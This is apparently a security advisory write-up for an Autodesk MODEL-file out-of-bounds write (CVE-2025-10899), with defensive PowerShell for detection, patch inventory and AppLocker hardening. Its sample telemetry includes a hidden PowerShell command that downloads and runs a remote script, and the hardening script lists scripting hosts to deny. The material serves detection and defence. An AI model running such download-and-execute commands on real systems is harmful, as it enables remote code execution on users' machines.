CVE-2025-10899 Overview
CVE-2025-10899 is an out-of-bounds write vulnerability [CWE-787] affecting Autodesk Shared Components and a broad range of Autodesk products. The flaw is triggered when a maliciously crafted MODEL file is parsed by an affected Autodesk application. An attacker who convinces a user to open such a file can cause a crash, induce data corruption, or execute arbitrary code in the context of the current process. Exploitation requires local access and user interaction, since the victim must open the malicious file in a vulnerable Autodesk product.
Critical Impact
Arbitrary code execution in the context of the current user across AutoCAD, Revit, Inventor, 3ds Max, Civil 3D, and other Autodesk 2026 products.
Affected Products
- Autodesk Shared Components, AutoCAD 2026, and AutoCAD verticals (Architecture, Electrical, Map 3D, Mechanical, MEP, Plant 3D)
- Autodesk Revit 2026, Revit LT 2026, Inventor 2026, 3ds Max 2026, Advance Steel 2026
- Autodesk Civil 3D 2026, Infraworks 2026, and Vault 2026
Discovery Timeline
- 2025-12-16 - CVE-2025-10899 published to NVD
- 2025-12-19 - Last updated in NVD database
Technical Details for CVE-2025-10899
Vulnerability Analysis
The vulnerability resides in the file-parsing logic shared across Autodesk products through the Shared Components library. When the parser processes a malformed MODEL file, it writes data beyond the bounds of an allocated buffer. This out-of-bounds write corrupts adjacent memory structures within the process address space. Depending on what is overwritten, the outcome ranges from an application crash to controlled corruption of function pointers or object metadata. An attacker who shapes the write primitive precisely can redirect execution and run code with the privileges of the user running the Autodesk application.
Because Shared Components is consumed by AutoCAD, Revit, Inventor, 3ds Max, Civil 3D, and other Autodesk 2026 products, a single parser defect propagates across the product family. Engineering and architecture environments frequently exchange MODEL files between vendors, contractors, and clients, which expands the attack surface.
Root Cause
The root cause is missing or insufficient bounds validation when the MODEL file parser writes attacker-controlled data into a fixed-size buffer. Field length values or indices inside the file are trusted without verifying that the resulting write remains within the allocated region. This is a classic CWE-787 pattern.
Attack Vector
The attack requires local access and user interaction. An attacker delivers a crafted MODEL file through email, a shared project workspace, a contractor handoff, or a cloud storage link. When the user opens the file in an affected Autodesk product, the parser triggers the out-of-bounds write and exploitation completes in the context of the current process. No network access to the workstation is required.
No public proof-of-concept is associated with this CVE in the available references. Technical specifics are described in the Autodesk Security Advisory ADSK-SA-2025-0024.
Detection Methods for CVE-2025-10899
Indicators of Compromise
- Unexpected crashes of acad.exe, revit.exe, inventor.exe, 3dsmax.exe, or other Autodesk processes immediately after opening a MODEL file.
- MODEL files arriving from untrusted senders or external project shares, particularly those with anomalous size or structure.
- Autodesk processes spawning unexpected child processes such as cmd.exe, powershell.exe, or rundll32.exe.
Detection Strategies
- Monitor process telemetry for Autodesk application crashes correlated with recent file-open events involving MODEL files.
- Flag any child process creation from Autodesk binaries that deviates from a baseline of legitimate helper utilities.
- Inspect Windows Error Reporting and Application Error (Event ID 1000) records raised by Autodesk processes, in particular exception code 0xc0000005 (access violation, which is also how a DEP-blocked execute attempt surfaces) and 0xc0000409 (fail-fast, raised for stack-cookie and Control Flow Guard failures). ASLR does not generate events of its own; its effect shows up as crashes rather than successful exploitation.
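The first two strategies above, as an added example that is not from the advisory or from Autodesk: a PowerShell function that runs over Sysmon-style process-creation records (Event ID 1: Image, ParentImage, CommandLine) and Application Error records (Event ID 1000: faulting application, exception code), flagging an Autodesk parent that spawns something outside a baseline and an Autodesk crash that follows a .model open within a time window. The event objects are constructed sample data, the baseline child list is an assumption to be tuned from your own telemetry, and the process and user names are illustrative.

```powershell
# Added example, not part of the advisory: correlate Autodesk process crashes and unexpected
# child processes over Sysmon-style ProcessCreate records (Event ID 1) and Application Error
# records (Event ID 1000). All events below are constructed sample data, not captured telemetry.

# Autodesk host processes named in the advisory's indicators.
$AutodeskImages = @('acad.exe', 'revit.exe', 'inventor.exe', '3dsmax.exe')

# Assumed baseline of legitimate children. Build the real list from your own telemetry;
# Autodesk products start their own helper utilities, which belong here once observed.
$BaselineChildren = @('conhost.exe', 'WerFault.exe')

function Get-Leaf([string] $Path) { [System.IO.Path]::GetFileName($Path) }

function Find-AutodeskSuspiciousActivity {
    param(
        [Parameter(Mandatory)] [object[]] $ProcessEvents,   # UtcTime, Image, ParentImage, CommandLine, User
        [Parameter(Mandatory)] [object[]] $CrashEvents,     # UtcTime, FaultingApp, ExceptionCode
        [int] $WindowMinutes = 10                           # crash must follow the .model open within this window
    )
    $alerts = [System.Collections.Generic.List[object]]::new()

    # Rule 1: an Autodesk parent spawned something outside the baseline (cmd, powershell, rundll32, ...).
    foreach ($e in $ProcessEvents) {
        $parent = Get-Leaf $e.ParentImage
        $child  = Get-Leaf $e.Image
        if (($AutodeskImages -contains $parent) -and ($BaselineChildren -notcontains $child)) {
            $alerts.Add([pscustomobject]@{
                Rule   = 'AutodeskUnexpectedChild'
                Time   = $e.UtcTime
                User   = $e.User
                Detail = "$parent spawned $child : $($e.CommandLine)"
            })
        }
    }

    # Rule 2: an Autodesk process faulted shortly after being launched with a .model file on its command line.
    foreach ($c in $CrashEvents) {
        $app = Get-Leaf $c.FaultingApp
        if ($AutodeskImages -notcontains $app) { continue }
        $opens = $ProcessEvents | Where-Object {
            (Get-Leaf $_.Image) -eq $app -and
            $_.CommandLine -match '\.model\b' -and
            $_.UtcTime -le $c.UtcTime -and
            ($c.UtcTime - $_.UtcTime).TotalMinutes -le $WindowMinutes
        }
        foreach ($o in $opens) {
            $alerts.Add([pscustomobject]@{
                Rule   = 'AutodeskCrashAfterModelOpen'
                Time   = $c.UtcTime
                User   = $o.User
                Detail = "$app faulted ($($c.ExceptionCode)) $([int]($c.UtcTime - $o.UtcTime).TotalSeconds)s after: $($o.CommandLine)"
            })
        }
    }
    return $alerts
}

# Constructed sample: a user opens a MODEL file from Downloads, acad.exe spawns a hidden
# PowerShell 40 s later and then faults with an access violation. 198.51.100.7 is a documentation address.
$t0 = [datetime]'2025-12-17T09:14:02Z'
$acad = 'C:\Program Files\Autodesk\AutoCAD 2026\acad.exe'
$sampleProcessEvents = @(
    [pscustomobject]@{ UtcTime = $t0;                Image = $acad; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = "`"$acad`" `"C:\Users\cad1\Downloads\site-plan.model`""; User = 'CORP\cad1' }
    [pscustomobject]@{ UtcTime = $t0.AddSeconds(40); Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = $acad
                       CommandLine = 'powershell.exe -nop -w hidden -c "iwr http://198.51.100.7/s.ps1 | iex"'; User = 'CORP\cad1' }
    [pscustomobject]@{ UtcTime = $t0.AddMinutes(3);  Image = 'C:\Windows\System32\conhost.exe'; ParentImage = $acad
                       CommandLine = 'conhost.exe'; User = 'CORP\cad1' }
)
$sampleCrashEvents = @(
    [pscustomobject]@{ UtcTime = $t0.AddSeconds(45); FaultingApp = $acad; ExceptionCode = '0xc0000005' }
)

Find-AutodeskSuspiciousActivity -ProcessEvents $sampleProcessEvents -CrashEvents $sampleCrashEvents |
    Format-Table Rule, Time, User, Detail -AutoSize -Wrap
```

On the sample data the function returns two alerts: the hidden PowerShell child (conhost.exe is in the baseline and is ignored) and the access violation 45 s after the .model open. To run it against live hosts, map `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}` and `Get-WinEvent -FilterHashtable @{LogName='Application'; ProviderName='Application Error'; Id=1000}` into objects with the same property names; the crash record's faulting application and exception code are in the event's message fields.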
Monitoring Recommendations
- Centralize endpoint logs from engineering workstations and alert on repeated Autodesk process termination events.
- Track inbound MODEL files via email and file-sharing gateways and apply attachment sandboxing where available.
- Maintain an inventory of Autodesk 2026 product versions installed across the environment to prioritize patch verification.
How to Mitigate CVE-2025-10899
Immediate Actions Required
- Apply the fixed builds referenced in Autodesk Security Advisory ADSK-SA-2025-0024 for every affected product in use.
- Instruct CAD and engineering users not to open MODEL files received from untrusted or unverified sources.
- Confirm that CAD and engineering users log on with standard user accounts rather than local administrator rights, so that code running inside a compromised Autodesk process is limited to that user's privileges.
Patch Information
Autodesk has published fixes through advisory ADSK-SA-2025-0024. Updates should be deployed using Autodesk Access or the standard enterprise deployment workflow. Confirm patched build numbers for each product, since Shared Components updates ship as part of individual product installers across AutoCAD, Revit, Inventor, 3ds Max, Civil 3D, Infraworks, Vault, and the AutoCAD verticals.
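The inventory and patch-verification steps described here and under Monitoring Recommendations, as an added example that is neither Autodesk's tooling nor part of the advisory: a PowerShell function that enumerates the Autodesk 2026 products registered in the Windows uninstall keys and compares each against a minimum fixed version. It contains no build numbers; the minimum versions must be taken from ADSK-SA-2025-0024 and passed in by the administrator. The display-name patterns and registry layout are standard Windows conventions, and the hashtable keys shown in the usage comment are assumed examples.

```powershell
# Added example, not part of the advisory: enumerate installed Autodesk 2026 products on a
# workstation and compare each against a minimum fixed version supplied from ADSK-SA-2025-0024.
# No fixed build numbers are embedded here; the advisory is the source of truth for them.

function Get-Autodesk2026Inventory {
    param(
        # DisplayName wildcard pattern -> minimum fixed version string, filled in by you from the
        # advisory. Empty by default so nothing here is presented as an official build number.
        [hashtable] $MinimumFixedVersion = @{}
    )
    # Per-machine uninstall entries, 64-bit and 32-bit views.
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object {
            $_.DisplayName -and
            ($_.Publisher -like 'Autodesk*' -or $_.DisplayName -like '*Autodesk*') -and
            $_.DisplayName -like '*2026*'
        } |
        ForEach-Object {
            $installed = $null
            [void][version]::TryParse($_.DisplayVersion, [ref]$installed)

            # First matching pattern in the baseline table wins.
            $required = $null
            foreach ($pattern in $MinimumFixedVersion.Keys) {
                if ($_.DisplayName -like $pattern) { $required = [version]$MinimumFixedVersion[$pattern]; break }
            }

            $status = if (-not $required)            { 'NoBaseline' }
                      elseif (-not $installed)       { 'UnparsableVersion' }
                      elseif ($installed -ge $required) { 'Patched' }
                      else                           { 'NeedsUpdate' }

            [pscustomobject]@{
                Product   = $_.DisplayName
                Installed = $_.DisplayVersion
                Required  = $required
                Status    = $status
                Publisher = $_.Publisher
            }
        } |
        Sort-Object Product -Unique
}

# Usage: supply the fixed versions from the advisory, keyed by a DisplayName pattern (assumed examples):
#   Get-Autodesk2026Inventory -MinimumFixedVersion @{ 'AutoCAD 2026*' = '<fixed build>'; 'Revit 2026*' = '<fixed build>' }
# Without a table the function still returns the inventory, with Status = NoBaseline.
Get-Autodesk2026Inventory | Format-Table Product, Installed, Required, Status -AutoSize
```

Run it through your endpoint management tool or `Invoke-Command` across the engineering workstations and keep the output as the patch-verification record. Products whose Shared Components are updated by a product installer will show the new product version; a Status of NoBaseline means the table has no entry for that product, not that it is patched.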
Workarounds
- Keep Autodesk applications working from vetted project directories and stop MODEL files from being opened straight out of temporary or download folders, for example by routing inbound files through a quarantine or review step. Note that application-control tooling such as AppLocker governs executables, scripts, and installers, not data files, so it cannot block a MODEL file by path on its own.
- Use application allowlisting to prevent Autodesk processes from launching unexpected child binaries such as scripting hosts.
- Sandbox or detonate untrusted MODEL files in an isolated environment before distributing them to engineering teams.
# Note: AppLocker path rules apply to executables, scripts, DLLs, installers, and packaged apps, not to
# data files, so a *.model path rule cannot stop a MODEL file from being opened. Use AppLocker for the
# child-process workaround instead: a Deny rule for scripting hosts, authored as an XML policy
# (New-AppLockerPolicy only generates Allow rules) and merged into the local policy. Path is an example.
Set-AppLockerPolicy -XmlPolicy "C:\Policies\Deny-ScriptHosts-CADUsers.xml" -Merge
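The allowlisting workaround above, as an added example that is neither Autodesk's nor part of the advisory: a PowerShell function that builds an AppLocker XML policy denying the Windows scripting hosts to a CAD user group, then merges it into the local policy and tests the effective result. AppLocker evaluates the user and the launched file, not the parent process, so this denies the hosts for those users regardless of what spawned them; a parent-aware rule (only block when the parent is acad.exe) needs an EDR custom rule rather than AppLocker. The group name CORP\CAD-Users, the test user CORP\cad1, and the list of hosts are assumptions; the policy is generated in AuditOnly mode so it can be reviewed before enforcement.

```powershell
# Added example, not part of the advisory: deny scripting hosts to a CAD user group with AppLocker.
# Assumptions: the group 'CORP\CAD-Users' and user 'CORP\cad1' are placeholders for your own names;
# the host list is a common starting point, not an exhaustive one.
# Requires an elevated session, a Windows edition that supports AppLocker enforcement, and the
# Application Identity service (sc.exe config appidsvc start= auto; Start-Service AppIDSvc).

function New-DenyScriptHostPolicyXml {
    param(
        [Parameter(Mandatory)] [string] $GroupName,                       # e.g. 'CORP\CAD-Users' (assumed)
        [ValidateSet('AuditOnly', 'Enabled')] [string] $Mode = 'AuditOnly'  # audit first, enforce after review
    )
    # Resolve the group to its SID; AppLocker rules are keyed by SID, not by name.
    $sid = (New-Object System.Security.Principal.NTAccount($GroupName)).Translate(
               [System.Security.Principal.SecurityIdentifier]).Value

    # Scripting hosts an exploit payload commonly pivots through. %SYSTEM32% is AppLocker's own
    # path variable; add the SysWOW64 copies if your baseline shows 32-bit hosts in use.
    $hosts = @(
        '%SYSTEM32%\WindowsPowerShell\v1.0\powershell.exe',
        '%SYSTEM32%\WindowsPowerShell\v1.0\powershell_ise.exe',
        '%SYSTEM32%\cscript.exe',
        '%SYSTEM32%\wscript.exe',
        '%SYSTEM32%\mshta.exe'
    )

    # One Deny FilePathRule per host, each with its own GUID as the AppLocker schema requires.
    $rules = foreach ($h in $hosts) {
        $name = [System.IO.Path]::GetFileNameWithoutExtension($h)
@"
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny $name for $GroupName" Description="CVE-2025-10899 workaround" UserOrGroupSid="$sid" Action="Deny">
      <Conditions><FilePathCondition Path="$h" /></Conditions>
    </FilePathRule>
"@
    }

    # Exe collection only; Deny rules are evaluated before Allow rules, so existing Allow rules
    # for the same users are not affected by the merge.
@"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="$Mode">
$($rules -join "`n")
  </RuleCollection>
</AppLockerPolicy>
"@
}

# Write the policy, merge it into the local AppLocker policy, and check the effective result
# for one CAD user against the 64-bit PowerShell host.
$xmlPath = Join-Path $env:TEMP 'Deny-ScriptHosts-CADUsers.xml'
New-DenyScriptHostPolicyXml -GroupName 'CORP\CAD-Users' | Set-Content -Path $xmlPath -Encoding UTF8
Set-AppLockerPolicy -XmlPolicy $xmlPath -Merge

Get-AppLockerPolicy -Effective |
    Test-AppLockerPolicy -Path "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" -User 'CORP\cad1'
```

Two caveats a practitioner should check before switching `-Mode Enabled`. First, if the Exe collection on the target machines has never been enforced, it needs the default Allow rules (Program Files and Windows) in place first, otherwise enforcing the collection blocks everything not explicitly allowed. Second, review the AppLocker event log (Microsoft-Windows-AppLocker/EXE and DLL, events 8003 in audit mode and 8004 once enforced) for a few days to confirm no legitimate CAD workflow depends on the denied hosts.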
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


